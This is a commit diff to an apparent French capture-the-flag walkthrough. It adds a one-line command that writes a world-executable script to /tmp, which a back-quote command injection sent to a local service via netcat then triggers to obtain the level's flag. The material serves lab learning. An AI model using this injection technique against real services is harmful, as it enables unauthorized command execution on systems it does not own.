ajout d'une precision + faciliter d'execution

Ajout du changement de droit pour l'execution du fichier
+ Comande e une ligne pour cree et changer les droit du fichier
This commit is contained in:
Lapin 2021-02-02 18:51:35 +01:00
parent b507af7eef
commit 8e67755b5d
1 changed files with 3 additions and 1 deletions

View File

@ -8,11 +8,13 @@
# On ne poura donc pas executer de comande en tant que tel. # On ne poura donc pas executer de comande en tant que tel.
# mais on peut executer un fichier # mais on peut executer un fichier
# Dans un fichier /tmp/.TOTO ont va mettre le contenu suivant: # Dans un fichier /tmp/.TOTO avec les droit en execution ont va mettre le contenu suivant:
#!/bin/sh #!/bin/sh
getflag > /tmp/.flag12 getflag > /tmp/.flag12
$ echo -e '#!/bin/sh \x0a getflag > /tmp/.flag12' > /tmp/.TOTO && chmod 777 /tmp/.TOTO
# puis on envoie un requet avec des back-quote pour executer le fichier # puis on envoie un requet avec des back-quote pour executer le fichier
$ nc -v localhost 4646 $ nc -v localhost 4646